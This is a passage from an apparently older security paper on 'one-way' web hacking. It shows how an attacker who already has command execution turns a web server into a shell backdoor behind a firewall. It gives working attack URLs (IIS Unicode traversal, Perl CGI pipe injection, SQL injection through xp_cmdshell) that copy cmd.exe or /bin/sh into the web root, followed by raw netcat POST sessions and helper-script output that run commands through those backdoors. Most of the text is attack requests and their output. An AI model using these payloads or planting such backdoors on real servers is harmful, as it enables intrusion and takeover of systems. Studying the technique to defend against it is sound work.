2.0 Flowchart for a one-way web hack
   Consider the example where an attacker finds a vulnerable web application, and is able to exploit it using techniques such as the ones mentioned previously. The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential: 
- Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network. 
- File transfer access - for transferring attack tools such as port scanners, rootkits, etc. 
A tight firewall can make it very difficult to achieve the above objectives, however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader. 
Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram: 

    
3.0 Finding the entry point
  The one-way hack begins when we are able to achieve remote command execution on the target web server. We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper. 
Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques. 
 The diagram below illustrates some of the techniques used to find an entry point:  

    
3.0.1 Exploiting URL parsing
  The Unicode / Double decode attack is a classic example of a URL parsing vulnerability. The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root: 
http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
    c:\winnt\system32\cmd.exe+c:\inetpub\scripts
    
3.0.2 Exploiting poorly validated input parameters
  In this example, an unchecked parameter is passed from the URL to a Perl CGI script news.cgi using the open() call in an insecure manner: 
http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+
    /usr/local/apache/cgi-bin/sh.cgi|
   The shell (/bin/sh) gets copied into the cgi-bin directory as sh.cgi.  
  
3.0.3 Exploiting SQL injection
  Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure: 
http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+
   'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'
    
3.1 Invoking the command interpreter
  Our objective of creating a backdoor by moving the command interpreter or the shell into the web document root is to be able to invoke it remotely over HTTP. The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated by standard output back over the HTTP connection. 
We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh.cgi (which is a copy of /bin/sh) on Apache and Linux. 
  
3.1.1 POSTing commands to CMD.EXE
  The example below shows two commands being run with CMD.EXE, which is accessible on http://www1.example.com/scripts/cmd.exe. The POST request is shown in blue letters. 
$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17
ver
dir c:\
exit
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>ver
Windows NT Version 4.0
C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A
Directory of c:\
10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free
C:\Inetpub\scripts>exit
$
  Some care needs to be taken in order for CMD.EXE to receive the commands properly, and for the web server to return the output of CMD.EXE properly. In the above example, we have included the "exit" command to ensure that the input stream to CMD.EXE terminates properly. The Content-length of the POST request is also calculated accordingly, keeping in mind the extra characters taken by "exit" 
  
3.1.2 POSTing commands to /bin/sh
  The example below shows three commands being run with /bin/sh, which is accessible on http://www2.example.com/cgi-bin/sh.cgi. The POST request is shown in bold letters. 
$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60
echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html
Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$
  The care and feeding of /bin/sh over Apache is slightly different. Apache expects a well formed HTTP response header from all its CGI programs, hence we have to prepend the lines "Content-type: text/html" in the output. The two "echo" commands are for this purpose. 
  
3.1.3 Automating the POST process
   We have created two Perl scripts post_cmd.pl and post_sh.pl to automate the task of preparing the proper POST requests for the commands and sending them to the web server. The syntax for invoking post_cmd.pl is as follows: 
usage: post_cmd.pl url [proxy:port] <>  
post_cmd.pl is written such that it can tunnel the POST requests over an HTTP proxy server as well. post_sh.pl is on similar lines. 
 The examples below show the same results being derived using the Perl scripts instead of forming our own POST requests:  
  
Output of post_cmd.pl
  $ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>ver
Windows NT Version 4.0
C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A
Directory of c:\
10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free
C:\Inetpub\scripts>exit
$
    
Output of post_sh.pl
  $ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html
Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$
  In this manner, we can issue multiple commands to the target web server using HTTP POST requests. This concept shall be used to create arbitrary files on the web server, as discussed in section 4.1